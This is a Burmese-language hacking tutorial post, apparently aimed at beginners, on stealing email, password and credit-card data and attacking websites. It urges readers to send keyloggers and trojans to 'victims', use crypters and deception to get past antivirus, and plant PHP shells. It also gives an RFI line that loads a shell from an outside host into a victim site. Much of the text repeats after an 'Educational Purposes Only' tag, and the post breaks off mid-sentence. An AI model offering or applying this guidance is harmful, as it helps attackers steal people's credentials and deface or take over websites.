အျခား အျခားေသာ forumေတြ၊ websiteေတြမွာ "Email ကို က်ေနာ္တုိ႔ ဘယ္လို hack ႏိုင္သလဲ? ခင္ဗ်ားက်ေနာ့္အတြက္ hack ေပးႏိုင္မလား ? ဆိုျပီး သန္းေပါင္းမ်ားစြာေသာလူေတြ ေမးေနၾကတာကို သတိျပဳမိၾကမယ္ ထင္ပါတယ္။ ဒီ့အတြက္ေၾကာင့္ ဒီ post ျဖစ္လာရတာျဖစ္ျပီး သင့္အတြက္ hacking နဲ႔ ဆိုင္တဲ႔ အေျခခံအေတြးအေခၚေလးေတြကို ေဖာ္ျပထားမွာ ျဖစ္ပါတယ္။ ဒါေတြကို ဘယ္လိုဆင့္ပြားျပီး အသံုးခ်ရမယ္ဆိုတာကေတာ့ သင္ ကိုယ့္ကိုကိုယ္ အားကိုးရပါလိမ့္မယ္။
ေနာက္ခံအေျခအေနHack တဲ႔ နည္းလမ္းေတြကို Windows 98 ဒီဇိုင္းျပဳလုပ္ျပီးကတည္းက စတင္ခဲ႔တာျဖစ္ပါတယ္။ Hacking ဆိုတာ အေျခခံအားျဖင့္ေတာ့ ေပ်ာ့ကြက္ ဟာကြက္ ကြင္းဆက္ေတြကို ရွာေဖြျပီး ၄င္းတို႔ထဲကမွာ အခ်ိဳ႕ယိုစိမ့္ႏိုင္တဲ႔ holeေတြကေန information ေတြထြက္လာေအာင္ ၾကိဳးစားတာျဖစ္ျပီး သင့္အတြက္ အေရးပါႏိုင္တဲ႔ Passwordမ်ား၊ Credit Card နဲ႔သက္ဆိုင္တဲ႔ အေသးစိတ္အခ်က္အလက္မ်ားကို ရယူခ်င္ ရယူႏိုင္ပါတယ္။ တခါတရံမွာေတာ့ ပုဂၢိဳလ္ေရးဆိုင္ရာ တိုက္ခိုက္မႈေတြအတြက္ အသံုးျပဳၾကပါတယ္။
သတိျပဳရန္အေၾကာင္းအရာက်ေနာ္ အၾကံေပးခ်င္တာကေတာ့ ေကာင္းမြန္တဲ႔ Site ေတြကေန ေဆာင္းပါးေတြ၊ ပို႔ခ်ခ်က္ေတြကို ေသခ်ာဖတ္ရႈေလ့လာဖို႔လိုပါတယ္။ ဒါဟာ သင့္အတြက္ Hacking ကို ေလ့လာျခင္းမွာ တစ္ခုတည္းေသာ နည္းလမ္းျဖစ္ပါတယ္။
မိတ္ဆက္အဓိကက်တဲ႔ အခ်က္ေတြ ကိုပဲ ေဖာ္ျပျပီး hacking နည္းလမ္း အခ်ိဳ႕႕ ကို အက်ဥ္းခ်ဳပ္ ေဆြးေႏြးသြားမွာျဖစ္ပါတယ္။ Hacking မွာ အေျခခံအားျဖင့္ အဓိကက်တဲ႔ အပိုင္း ႏွစ္ပိုင္းအေနနဲ႔ ကြဲထြက္ေနပါတယ္။ အဲဒါကေတာ့...၁။ Email (သို႔) User information၂။ Web based hacking တို႔ပဲျဖစ္ပါတယ္။
Email (သို႔) User informationယေန႔အခ်ိန္ကာလမ်ားမွာ အမ်ားဆံုးအသံုးျပဳေနက်ျဖစ္တဲ႔ ၊ Email, Passwords, Credit Card details စတဲ႔ user information မ်ားကို hack တဲ႔အခါ ေက်ာ္ၾကားေနတဲ႔ နည္းလမ္းေတြကေတာ့ ေအာက္ပါအတိုင္းျဖစ္ပါတယ္...(က) Phishing( ခ ) Brute Forcing( ဂ ) Keylogging(ဃ) Trojans
(က) PhishingPhishing ဆိုတာကေတာ့ ပံုမွန္အားျဖင့္ ထူးျခားတဲ႔ တုိက္ခုိက္မႈတစ္ခုျဖစ္ပါတယ္။ hacker ေတြက အခ်ိဳ႕ website (သို႔) gmail နဲ႔ လံုး၀နီးပါးဆင္တူတဲ႔ page တစ္ခုကို ဖန္တီးလိုက္ျခင္းျဖစ္ပါတယ္။ ဒီ page ေတြကို hacker ေတြက သူတို႔ရဲ႕ ကိုယ္ပိုင္ server ေတြမွာ upload လုပ္ၾကပါတယ္။ အဲဒီေနာက္ user အသစ္ေတြဆီကို အဲဒီ link ေတြေပးပို႔ပါတယ္။ user ေတြက အဲဒီ link ကိုဖြင့္လိုက္တဲ႔ အခါ user ေတြ အေနနဲ႔ သူတို႔ ေရာက္ခ်င္တဲ႔ website (သို႔) gmail လို႔ထင္ျပီး သူတို႔ရဲ႕ username နဲ႔ password ေတြကို ရိုက္ထည့္ျပီး sign in (သို႔) submit ကို click လိုက္ျပီဆိုရင္ေတာ့ အဲဒီ user ရဲ႕ information ေတြကို hacker ကရရွိသြားပါျပီ။ ဒီနည္းလမ္းကို hacking ေလာကထဲကို ၀င္ေရာက္ဖို႔ၾကိဳးစားေနၾကတဲ႔ လူသစ္ေတြ က်ယ္က်ယ္ျပန္႔ျပန္႔အသံုးျပဳေနတဲ႔ နည္းလမ္းတစ္ခုျဖစ္ပါတယ္။ ဒီနည္းလမ္းရဲ႕ ျပဳလုပ္ပံုအဆင့္ဆင့္ကိုSimple Hacking ( Fake Login ျပဳလုပ္ျခင္း) ဆိုတဲ႔ post မွာေဖာ္ျပခဲ႔ျပီးျဖစ္ပါတယ္။ဒီနည္းလမ္းကို အသံုးျပဳျပီး အိႏၵိယမွာ ရွိတဲ႔ ICICI bank နဲ႔ပတ္သတ္ျပီး ျဖစ္ခဲ႔တဲ႔ သာဓက တစ္ခုရွိပါတယ္။ မ်ားစြာေသာ user info ေတြကို ဒီနည္းလမ္းကို အသံုးျပဳျပီး အခိုးခံခဲ႔ရတာျဖစ္ပါတယ္။
အားနည္းခ်က္ :လူေတာ္ေတာ္မ်ားမ်ားက ဒီနည္းလမ္းကို အသံုးျပဳဖို႔ၾကိဳးစားေနဆဲျဖစ္ပါတယ္။ ဒါေပမယ့္ ဒီနည္းလမ္းမွာ အားနည္းခ်က္တစ္ခုရွိေနပါတယ္ အဲဒါကေတာ့ သားေကာင္ဟာ internet နဲ႔ပတ္သတ္ျပီး ဗဟုသုတ အနည္းငယ္ရွိရံုနဲ႔ ဒီ page ဟာ အစစ္မဟုတ္မွန္းသိႏိုင္ပါတယ္... ဘာေၾကာင့္လဲဆိုေတာ့ သူက URL ကို ဖတ္ၾကည့္မယ္ ဒါဆိုရင္ မူရင္း website မဟုတ္ဘူးဆိုတာကို နားလည္သြားႏိုင္ပါတယ္။
( ခ ) Brute ForcingBrute Forcer ဆိုတာကေတာ့ အေျခခံအားျဖင့္ cracker လို႔ေခၚဆိုႏိုင္တဲ႔ program တစ္ခုျဖစ္ပါတယ္။ အဲဒီ Brute Forcer ထဲမွာသင္က သင္ hack ခ်င္တဲ႔ username ကို ထည့္သြင္းရပါမယ္...ျပီးေတာ့ notepad file တစ္ခုကိုလည္း password တစ္ခုကဲ႔သို႔ထည့္သြင္းရမွာျဖစ္ျပီး အဲဒီ notepad ထဲမွာ ရွိသမွ် အားလံုးနီးပါး အဂၤလိပ္ဘာသာစာလံုးေတြ ပါရိွရမွာျဖစ္ပါတယ္။ ၄င္းက ဘယ္လိုအလုပ္လုပ္သလဲဆိုေတာ့ password မွာပါတ႔ဲ စာလံုးတစ္လံုးစီတိုင္းအတြက္ notepad file ထဲမွာ ရွိသမွ် စာလံုးတိုင္းနဲ႔ တိုက္ၾကည့္ပါတယ္။ အားလံုးတူညီသြားျပီ ဆိုရင္ေတာ့ ပြဲသိမ္းပဲေပါ့...။ တျခား forum ေတြမွာ " huge pass list" ဆိုတဲ႔ ေခါင္းစဥ္ကို သတိျပဳမိခ်င္ျပဳမိပါလိမ့္မယ္။ ၄င္းတို႔က ဘာမွေတာ့မဟုတ္ပါဘူး...ဒါေပမယ့္ သင့္ရဲ႕ bruteforcer ထဲကို ထည့္သြင္းဖို႔ password list ျဖစ္ပါတယ္။
အားနည္းခ်က္ :၁။ တခါတရံမွာ brute forcing ဟာ အခ်ိန္အလြန္ၾကာျမင့္တတ္ပါတယ္။၂။ ၄င္းဟာ အာမခံခ်က္ မရွိပါဘူး၃။ ယေန႔အခ်ိန္ကာလမွာဆိုရင္ လူေတာ္ေတာ္မ်ားမ်ားဟာ alpha-numeric-symbol password ေတြရွိေနၾကပါျပီ။ bruteforcer အတြက္ ၄င္းတို႔က detect လုပ္ဖို႔ အလြန္ခက္ခဲပါတယ္။၄။ ေက်ာ္ၾကားတဲ႔ gmail ကဲ႔သို႔ေသာ site ေတြမွာ ျပဳလုပ္ထားတဲ႔ ဒီဇိုင္းတစ္ခုကေတာ့ login ုလုပ္တဲ႔အခါ ၃ ခါထက္ေက်ာ္ျပီး မွားယြင္းေနျပီးဆိုရင္ ၄င္းတို႕ က "image captcha" ကိုထည့္လိုက္တဲ႔အတြက္ bruteforcer ကို ရပ္သြားေစပါတယ္။
( ဂ ) KeyloggingKeylogger ကေတာ့ "server" လို႔ ေခၚဆိုႏိုင္တဲ႔ file ေသးေသးေလးေတြကို ဖန္တီးဖို႔အတြက္ သင့္ကို ကူညီေပးပါလိမ့္မယ္။ သင္က သင့္ရဲ႕ server ကို သားေကာင္ ဆီသို႔ ေပးပို႔ရမွာျဖစ္ပါတယ္။ သင့္ရဲ႕ သားေကာင္က အဲဒီအေပၚမွာ click လိုက္ရင္ေတာ့ ကိစၥျပီး ပါျပီ။ဒီနည္းလမ္းဟာ တစ္စံုတစ္ေယာက္ကို hack ဖို႔အတြက္ အေကာင္းဆံုးနည္းလမ္းတစ္ခု ျဖစ္ႏိုင္ပါတယ္။ Keylogger ဆိုတာကေတာ့ သင့္သားေကာင္ရဲ႕ computer ထဲမွာ သူဟာသူ install လုပ္ႏိုင္တဲ႔ program တစ္ခုျဖစ္ျပီး သင့္သားေကာင္က သူ႔ရဲ႕ keyboard ေပၚမွာ ရိုက္လိုက္သမွ် keystrokeတိုင္းကို မွတ္တမ္းတင္ထားပါတယ္။ ျပီးရင္ ၄င္းက မွတ္တမ္းတင္လို႔ ရသမွ်ေတြကို hacker ဆီသို႔ေပးပို႔ပါတယ္။ keystroke ( ဆိုလိုတာက FTP, Email , Messengers ) ကို လက္ခံရရွိဖို႔ အမ်ားၾကီးလမ္းရွိပါတယ္။ က်ေနာ့္အေနနဲ႔ေျပာရရင္ ဒီနည္းလမ္းဟာ သင့္ရဲ႕ သားေကာင္ကို လွည့္စားျပီး သူတို႔ရဲ႕ information ေတြကို ရယူဖို႔အတြက္ အေကာင္းဆံုးနည္းလမ္းတစ္ခုျဖစ္ပါတယ္။ ( Keylogger Collection )
အားနည္းခ်က္ :၁။ သင့္ရဲ႕ သားေကာင္က keylogger ကိုလက္ခံရရွိတဲ႔ အခါ သူတို႔ရဲ႕ antivirus ေတြက keylogger ကို အလိုအေလွ်ာက္ delete လုပ္လိုက္ျခင္းျဖစ္ပါတယ္။ ဒါေၾကာင့္ သင္အေနနဲ႔ တစ္စံုတစ္ရာ လွည့္ျဖားျခင္းအားျဖင့္ antivirus ကို disable လုပ္ဖို႔ စည္းရံုးသိမ္းသြင္းရမွာ ျဖစ္ပါတယ္။
၂။ တခါတရံမွာ keylogေတြကို ေပးပို႔ေနတဲ႔အခ်ိန္မွာ firewall က block လုပ္လိုက္ျခင္းမ်ားပဲ ျဖစ္ပါတယ္။
အၾကံျပဳခ်က္ - က်ေနာ္အၾကံေပးလိုတာကေတာ့ "crypters" လို႔ေခၚတ႔ဲ program ေတြကို အသံုးျပဳဖို႔ပါပဲ။ ၄င္းတို႔က သင့္ရဲ႕ server ေတြကို ရွာေဖြမေတြ႔ပဲ ျပဳလုပ္ႏိုင္ေစဖို႔ကူညီေပးပါလိမ့္မယ္။ ဒါဆိုရင္ သင့္သားေကာင္ရဲ႕ anti-virus ေတြက ၄င္းတို႔ကို detect မလုပ္ႏိုင္ေတာ့ပါဘူး။ Anti-Virus နဲ႔ တူတူပုန္းတမ္းကစားၾကမယ္ ဆိုတဲ႔ post မွာ Crypter ေတြကို တင္ေပးထားခဲ႔ျပီး ျဖစ္ပါတယ္။
(ဃ) TrojansTrojan ေတြကေတာ့ keyloggerေတြရဲ႕ ဖခင္ နဲ႔တူပါတယ္။ Trojan ေတြက အေပၚမွာ ေဖာ္ျပခဲ႔တဲ႔ keylogger ေတြအတိုင္းပဲ သင့္ဆီကို keylog ေတြ ေပးပို႔ပါတယ္။ ဒါ့အျပင္ ၄င္းတို႔က သင့္သားေကာင္းရဲ႕ computer ကို သင္ ထိန္းခ်ဳပ္မႈ ရေစပါတယ္။ သင့္သားေကာင္ရဲ႕ computer မွာ သင့္စိတ္ၾကိဳက္ fileေတြကို Edit / delete/ upload/ download လုပ္ႏိုင္ပါတယ္။ Trojan ေတြမွာ keyboard ကို ေကာင္းေကာင္း အလုပ္မလုပ္ေအာင္ ( keyboard မွာ ကိုယ္ႏွိပ္လိုက္တဲ႔ စာလံုးက တစ္ခု ေပၚေနတာက တစ္ခု ေပၚခ်င္တဲ႔ စာလံုးေလွ်ာက္ေပၚေနတာ၊ တခါတေလ keys ေတြကို ရိုက္လို႔ရတဲ႔ အခါ ရတယ္ မရတဲ႔ အခါလည္း မရဘူး အဲလိုမ်ိဳးေတြေပါ့ )၊ CD ROM ေတြ Eject လုပ္တဲ႔ အခါ ထြက္မလာတာ ၊ CD ျပန္ထည့္ေပးဖို႔အတြက္ ေတာင္းဆိုတာ စသျဖင့္ အျခား အျခားေသာ feature ေတြလည္း ပါ၀င္ပါေသးတယ္။ ( Trojan Toolမ်ား )
အားနည္းခ်က္ :keylogger ေတြနဲ႔ အတူတူပါပဲ။
အၾကံျပဳခ်က္ - keylogger မွာ အၾကံဳျပဳခဲ႔သလိုပါပဲ crypter ေတြသံုးပါ။
Web Hacking
က်ေနာ္က ဘယ္ website မဆို hack ဖို႔အတြက္ hacker ေတြကို အကူအညီေပးႏိုင္တဲ႔ အသံုးျပဳမႈအမ်ားဆံုးျဖစ္တဲ႔ web hacking နည္းပညာ အခ်ိဳ႕ ကို ေဆြးေႏြးေပးသြားပါမယ္။ တဘက္ကၾကည့္ရင္လည္း ဒါဟာ သင္ site ကို ကာကြယ္ဖို႔အတြက္ ကူညီပါလိမ့္မယ္။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI
( င ) ေနာက္ထပ္အမ်ားၾကီး ရွိပါေသးတယ္။ ဒါေပမယ့္ ဒီမွာေတာ့ အသံုးျပဳမႈအမ်ားဆံုးျဖစ္တာကိုပဲ ေဆြးေႏြးသြားမွာ ျဖစ္ပါတယ္။
(က) SQL Injection
ယေန႔အခ်ိန္အခါမွာ website အမ်ားစုဟာ SQL Database တစ္ခုနဲ႔ connect လုပ္ထားၾကပါတယ္။ SQL Databaseက သူတို႔ရဲ႕ website သို႔ လာေရာက္လာပတ္သူက register လုပ္သြားတဲ႔အခါ username နဲ႔ password ေတြ ( encrypt လုပ္ျပီး )ကို သိမ္းဆည္းထားဖို႔အတြက္ သူတို႔ကို ကူညီပါတယ္။ SQL database က user တစ္ေယာက္ logs in လုပ္တဲ႔ အခါတိုင္းမွာ ေမးခြန္းေတြေမးျမန္းတဲ႔ အလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ပါတယ္။ ၄င္းတို႔ database ဆီသြားျပီး မွန္ကန္ေသခ်ာတဲ႔ password ဟုတ္မဟုတ္ ၾကည့္ပါတယ္။ အကယ္၍ မွန္ကန္တယ္ဆုိရင္ေတာ့ user ကို log in လိုက္ပါတယ္၊ မမွန္ဘူးဆိုရင္ေတာ့ error တစ္ခုကို ေပးပါလိမ့္မယ္။ ဒါေၾကာင့္ အေျခခံေဆာင္ရြက္ခ်က္ကေတာ့ database မွာရွိတဲ႔ internet information ကုိ အသံုးခ်ဖို႔ၾကိဳးစားျပီး database ထဲမွာရွိတဲ႔ database ထဲမွာ ေမးခြန္းတစ္ခုကို စစ္ေဆးဖို႔ command တစ္ခုကို လိုက္နာေဆာင္ရြက္ေနျခင္းျဖစ္ပါတယ္။ ဒီနည္းလမ္းနဲ႔ ပတ္သတ္ျပီး ဒီ post ထဲမွာ ထည့္သြင့္ဖို႔ဆိုတာ တကယ့္ကို မျဖစ္ႏိုင္ပါဘူး။ ဘာေၾကာင့္လဲဆိုေတာ့ ဒီနည္းလမ္းဟာ website ကို hack ဖို႔အတြက္ နည္းလမ္းေတြထဲမွာ အရႈပ္ေထြး အခက္ခဲဆံုးနည္းလမ္းတစ္ခု ျဖစ္လို႔ပါ။
သင့္ရဲ႕ website မွာ RFI attach လုပ္ဖို႔ အားနည္းခ်က္ရွိလား မရွိလားဆိုတာကို သိခ်င္ရင္ ေအာက္ပါအတိုင္းျပဳလုပ္ပါ...အကယ္၍ သင့္ site ရဲ႕ URL က....
yoursite.com/index.php?id=545
ျဖစ္ေနတယ္ဆိုရင္ ၄င္းရဲ႕ အဆံုးမွာ ( ' ) ကို ေအာက္မွာ ျပထားသလိုမ်ိဳး ေပါင္းထည့္ေပးပါ...
yoursite.com/index.php?id=545'
( ခ ) XSS
XSS ကေတာ့ အခ်ိဳ႕ website ေတြကို hack ဖို႔အတြက္ ေကာင္းမြန္တဲ႔ အျခားနည္းလမ္းတစ္ခုလို႔ ဆိုႏိုင္ပါတယ္။ အခ်ိဳ႕ website/ forum ေတြက post ( သို႔ ) ေဆာင္းပါး ေတြထဲမွာ HTML ခြင့္ျပဳခဲ႔မယ္ဆိုရင္ hacker က content ထဲကို အႏၲရာယ္ရွိတဲ႔ script ေတြကို post လုပ္ႏိုင္ပါတယ္။ ဒါေၾကာင့္ ဘယ္အခ်ိန္မဆို user တစ္ေယာက္က page ကုိဖြင့္လိုက္တုိင္း cookieေတြက hacker ဆီကိုေပးပို႔ပါလိမ့္မယ္။ ဒီအတြက္ သူက user ကဲ႔သို႔ log in လုပ္ႏိုင္ျပီး website ကို #$%@# လုပ္ပါေတာ့တယ္။
( ဂ ) Shells
Shell ဆိုတာကေတာ့ အႏၲရာယ္ရွိတဲ႔ .php script ျဖစ္ပါတယ္။ ၄င္းကိုဘယ္လိုလုပ္ရမလဲ ဆိုေတာ့ avaters, recepie, tricks , feedbacks ကဲ႔သို႔ေသာ ဘယ္ဖိုင္မဆို upload လုပ္ႏိုင္တဲ႔ website တစ္ခုခုမွာ ေနရာ တစ္ခု ရွာပါ။ ျပီးရင္ သင့္ရဲ႕ shell file ကို အဲဒီထဲကို upload လုပ္ႏိုင္ဖို႔ၾကိဳးစားပါ။ upload ျပီးသြားရင္ ၄င္းကို URL bar မွာဖြင့္ပါ။ အဲဒီ webhosting ရဲ႕ FTP account တစ္ခုလံုးကို သင္ ျမင္ရပါလိမ့္မယ္။ index page ထဲဲမွာပါ၀င္သမွ်ကို သင့္စိတ္ၾကိဳက္ rename/Edit/upload/download ၾကိဳက္သလိုလုပ္လို႔ရပါျပီ။ အခုလိုျပဳလုပ္ျခင္းကို deface လို႔လည္း ေခၚပါတယ္။
(ဃ) RFI
RFI ကလည္း website တစ္ခုကို deface လုပ္ဖို႔အတြက္ ေကာင္းတဲ့နည္းလမ္းတစ္ခုပဲ ျဖစ္ပါတယ္။ ၄င္းကို shell နဲ႔အတူအသံုးျပဳရမွာ ျဖစ္ပါတယ္။ ၄င္းကို သင့္ရဲ႕ shell ေပၚမွာ upload လုပ္ျပီးျပီး ဆုိရင္ သင့္ကိုအေထာက္အကူေပးပါလိမ့္မယ္...
yoursite.com/shell.txt
သင္က RFT သို႔ အားနည္းခ်က္ရွိတဲ႔ site တစ္ခုကို ရွာေတြ႔ရပါမယ္... အဲဒီေနာက္ ေအာက္မွာျပထားတဲ႔ အတိုင္း ျပဳလုပ္ႏိုင္ပါတယ္...
victimssite.com/index.php?page=yousite.com/shell.txt
ဒီဟာက သင့္ကို သင့္သားေကာင္ရဲ႕ sites FTP ၀င္လမ္း ကုိ ထပ္ေပးပါလိမ့္မယ္။ shell မွာလိုပဲ သင္ၾကိဳက္သလို သင့္စိတ္ၾကိဳက္ လုပ္လို႔ရပါျပီ။
အကယ္၍ သင္က သင့္ website က RFI attach လုပ္ဖို႔ အားနည္းခ်က္ ရွိလား မရွိဘူးလားဆိုတာကို စစ္ေဆးခ်င္ရင္ ေအာက္ပါအတိုင္း လုပ္ပါ...
အကယ္၍ သင့္ site ရဲ႕ URL က
yoursite.com/index.php?id=545
ျဖစ္ေနခဲ႔ရင္ ၄င္းရဲ႕ အဆံုးမွာ ေအာက္မွာျပထားတဲ႔ အတိုင္း ေပါင္းထည့္ေပးပါ...
yoursite.com/index.php?id=http://www.google.com
အကယ္၍ သင့္ page ထဲမွာ google page ပါ၀င္ေနမယ္ဆိုရင္ေတာ့ အဲဒီအဓိပၸာယ္က RFI သို႔ တြဲဆက္ျခင္းမွာ ေပ်ာ့ကြက္တစ္ခုျဖစ္ပါတယ္။
(Educational Purposes Only)
ေနာက္ခံအေျခအေနHack တဲ႔ နည္းလမ္းေတြကို Windows 98 ဒီဇိုင္းျပဳလုပ္ျပီးကတည္းက စတင္ခဲ႔တာျဖစ္ပါတယ္။ Hacking ဆိုတာ အေျခခံအားျဖင့္ေတာ့ ေပ်ာ့ကြက္ ဟာကြက္ ကြင္းဆက္ေတြကို ရွာေဖြျပီး ၄င္းတို႔ထဲကမွာ အခ်ိဳ႕ယိုစိမ့္ႏိုင္တဲ႔ holeေတြကေန information ေတြထြက္လာေအာင္ ၾကိဳးစားတာျဖစ္ျပီး သင့္အတြက္ အေရးပါႏိုင္တဲ႔ Passwordမ်ား၊ Credit Card နဲ႔သက္ဆိုင္တဲ႔ အေသးစိတ္အခ်က္အလက္မ်ားကို ရယူခ်င္ ရယူႏိုင္ပါတယ္။ တခါတရံမွာေတာ့ ပုဂၢိဳလ္ေရးဆိုင္ရာ တိုက္ခိုက္မႈေတြအတြက္ အသံုးျပဳၾကပါတယ္။
သတိျပဳရန္အေၾကာင္းအရာက်ေနာ္ အၾကံေပးခ်င္တာကေတာ့ ေကာင္းမြန္တဲ႔ Site ေတြကေန ေဆာင္းပါးေတြ၊ ပို႔ခ်ခ်က္ေတြကို ေသခ်ာဖတ္ရႈေလ့လာဖို႔လိုပါတယ္။ ဒါဟာ သင့္အတြက္ Hacking ကို ေလ့လာျခင္းမွာ တစ္ခုတည္းေသာ နည္းလမ္းျဖစ္ပါတယ္။
မိတ္ဆက္အဓိကက်တဲ႔ အခ်က္ေတြ ကိုပဲ ေဖာ္ျပျပီး hacking နည္းလမ္း အခ်ိဳ႕႕ ကို အက်ဥ္းခ်ဳပ္ ေဆြးေႏြးသြားမွာျဖစ္ပါတယ္။ Hacking မွာ အေျခခံအားျဖင့္ အဓိကက်တဲ႔ အပိုင္း ႏွစ္ပိုင္းအေနနဲ႔ ကြဲထြက္ေနပါတယ္။ အဲဒါကေတာ့...၁။ Email (သို႔) User information၂။ Web based hacking တို႔ပဲျဖစ္ပါတယ္။
Email (သို႔) User informationယေန႔အခ်ိန္ကာလမ်ားမွာ အမ်ားဆံုးအသံုးျပဳေနက်ျဖစ္တဲ႔ ၊ Email, Passwords, Credit Card details စတဲ႔ user information မ်ားကို hack တဲ႔အခါ ေက်ာ္ၾကားေနတဲ႔ နည္းလမ္းေတြကေတာ့ ေအာက္ပါအတိုင္းျဖစ္ပါတယ္...(က) Phishing( ခ ) Brute Forcing( ဂ ) Keylogging(ဃ) Trojans
(က) PhishingPhishing ဆိုတာကေတာ့ ပံုမွန္အားျဖင့္ ထူးျခားတဲ႔ တုိက္ခုိက္မႈတစ္ခုျဖစ္ပါတယ္။ hacker ေတြက အခ်ိဳ႕ website (သို႔) gmail နဲ႔ လံုး၀နီးပါးဆင္တူတဲ႔ page တစ္ခုကို ဖန္တီးလိုက္ျခင္းျဖစ္ပါတယ္။ ဒီ page ေတြကို hacker ေတြက သူတို႔ရဲ႕ ကိုယ္ပိုင္ server ေတြမွာ upload လုပ္ၾကပါတယ္။ အဲဒီေနာက္ user အသစ္ေတြဆီကို အဲဒီ link ေတြေပးပို႔ပါတယ္။ user ေတြက အဲဒီ link ကိုဖြင့္လိုက္တဲ႔ အခါ user ေတြ အေနနဲ႔ သူတို႔ ေရာက္ခ်င္တဲ႔ website (သို႔) gmail လို႔ထင္ျပီး သူတို႔ရဲ႕ username နဲ႔ password ေတြကို ရိုက္ထည့္ျပီး sign in (သို႔) submit ကို click လိုက္ျပီဆိုရင္ေတာ့ အဲဒီ user ရဲ႕ information ေတြကို hacker ကရရွိသြားပါျပီ။ ဒီနည္းလမ္းကို hacking ေလာကထဲကို ၀င္ေရာက္ဖို႔ၾကိဳးစားေနၾကတဲ႔ လူသစ္ေတြ က်ယ္က်ယ္ျပန္႔ျပန္႔အသံုးျပဳေနတဲ႔ နည္းလမ္းတစ္ခုျဖစ္ပါတယ္။ ဒီနည္းလမ္းရဲ႕ ျပဳလုပ္ပံုအဆင့္ဆင့္ကိုSimple Hacking ( Fake Login ျပဳလုပ္ျခင္း) ဆိုတဲ႔ post မွာေဖာ္ျပခဲ႔ျပီးျဖစ္ပါတယ္။ဒီနည္းလမ္းကို အသံုးျပဳျပီး အိႏၵိယမွာ ရွိတဲ႔ ICICI bank နဲ႔ပတ္သတ္ျပီး ျဖစ္ခဲ႔တဲ႔ သာဓက တစ္ခုရွိပါတယ္။ မ်ားစြာေသာ user info ေတြကို ဒီနည္းလမ္းကို အသံုးျပဳျပီး အခိုးခံခဲ႔ရတာျဖစ္ပါတယ္။
အားနည္းခ်က္ :လူေတာ္ေတာ္မ်ားမ်ားက ဒီနည္းလမ္းကို အသံုးျပဳဖို႔ၾကိဳးစားေနဆဲျဖစ္ပါတယ္။ ဒါေပမယ့္ ဒီနည္းလမ္းမွာ အားနည္းခ်က္တစ္ခုရွိေနပါတယ္ အဲဒါကေတာ့ သားေကာင္ဟာ internet နဲ႔ပတ္သတ္ျပီး ဗဟုသုတ အနည္းငယ္ရွိရံုနဲ႔ ဒီ page ဟာ အစစ္မဟုတ္မွန္းသိႏိုင္ပါတယ္... ဘာေၾကာင့္လဲဆိုေတာ့ သူက URL ကို ဖတ္ၾကည့္မယ္ ဒါဆိုရင္ မူရင္း website မဟုတ္ဘူးဆိုတာကို နားလည္သြားႏိုင္ပါတယ္။
( ခ ) Brute ForcingBrute Forcer ဆိုတာကေတာ့ အေျခခံအားျဖင့္ cracker လို႔ေခၚဆိုႏိုင္တဲ႔ program တစ္ခုျဖစ္ပါတယ္။ အဲဒီ Brute Forcer ထဲမွာသင္က သင္ hack ခ်င္တဲ႔ username ကို ထည့္သြင္းရပါမယ္...ျပီးေတာ့ notepad file တစ္ခုကိုလည္း password တစ္ခုကဲ႔သို႔ထည့္သြင္းရမွာျဖစ္ျပီး အဲဒီ notepad ထဲမွာ ရွိသမွ် အားလံုးနီးပါး အဂၤလိပ္ဘာသာစာလံုးေတြ ပါရိွရမွာျဖစ္ပါတယ္။ ၄င္းက ဘယ္လိုအလုပ္လုပ္သလဲဆိုေတာ့ password မွာပါတ႔ဲ စာလံုးတစ္လံုးစီတိုင္းအတြက္ notepad file ထဲမွာ ရွိသမွ် စာလံုးတိုင္းနဲ႔ တိုက္ၾကည့္ပါတယ္။ အားလံုးတူညီသြားျပီ ဆိုရင္ေတာ့ ပြဲသိမ္းပဲေပါ့...။ တျခား forum ေတြမွာ " huge pass list" ဆိုတဲ႔ ေခါင္းစဥ္ကို သတိျပဳမိခ်င္ျပဳမိပါလိမ့္မယ္။ ၄င္းတို႔က ဘာမွေတာ့မဟုတ္ပါဘူး...ဒါေပမယ့္ သင့္ရဲ႕ bruteforcer ထဲကို ထည့္သြင္းဖို႔ password list ျဖစ္ပါတယ္။
အားနည္းခ်က္ :၁။ တခါတရံမွာ brute forcing ဟာ အခ်ိန္အလြန္ၾကာျမင့္တတ္ပါတယ္။၂။ ၄င္းဟာ အာမခံခ်က္ မရွိပါဘူး၃။ ယေန႔အခ်ိန္ကာလမွာဆိုရင္ လူေတာ္ေတာ္မ်ားမ်ားဟာ alpha-numeric-symbol password ေတြရွိေနၾကပါျပီ။ bruteforcer အတြက္ ၄င္းတို႔က detect လုပ္ဖို႔ အလြန္ခက္ခဲပါတယ္။၄။ ေက်ာ္ၾကားတဲ႔ gmail ကဲ႔သို႔ေသာ site ေတြမွာ ျပဳလုပ္ထားတဲ႔ ဒီဇိုင္းတစ္ခုကေတာ့ login ုလုပ္တဲ႔အခါ ၃ ခါထက္ေက်ာ္ျပီး မွားယြင္းေနျပီးဆိုရင္ ၄င္းတို႕ က "image captcha" ကိုထည့္လိုက္တဲ႔အတြက္ bruteforcer ကို ရပ္သြားေစပါတယ္။
( ဂ ) KeyloggingKeylogger ကေတာ့ "server" လို႔ ေခၚဆိုႏိုင္တဲ႔ file ေသးေသးေလးေတြကို ဖန္တီးဖို႔အတြက္ သင့္ကို ကူညီေပးပါလိမ့္မယ္။ သင္က သင့္ရဲ႕ server ကို သားေကာင္ ဆီသို႔ ေပးပို႔ရမွာျဖစ္ပါတယ္။ သင့္ရဲ႕ သားေကာင္က အဲဒီအေပၚမွာ click လိုက္ရင္ေတာ့ ကိစၥျပီး ပါျပီ။ဒီနည္းလမ္းဟာ တစ္စံုတစ္ေယာက္ကို hack ဖို႔အတြက္ အေကာင္းဆံုးနည္းလမ္းတစ္ခု ျဖစ္ႏိုင္ပါတယ္။ Keylogger ဆိုတာကေတာ့ သင့္သားေကာင္ရဲ႕ computer ထဲမွာ သူဟာသူ install လုပ္ႏိုင္တဲ႔ program တစ္ခုျဖစ္ျပီး သင့္သားေကာင္က သူ႔ရဲ႕ keyboard ေပၚမွာ ရိုက္လိုက္သမွ် keystrokeတိုင္းကို မွတ္တမ္းတင္ထားပါတယ္။ ျပီးရင္ ၄င္းက မွတ္တမ္းတင္လို႔ ရသမွ်ေတြကို hacker ဆီသို႔ေပးပို႔ပါတယ္။ keystroke ( ဆိုလိုတာက FTP, Email , Messengers ) ကို လက္ခံရရွိဖို႔ အမ်ားၾကီးလမ္းရွိပါတယ္။ က်ေနာ့္အေနနဲ႔ေျပာရရင္ 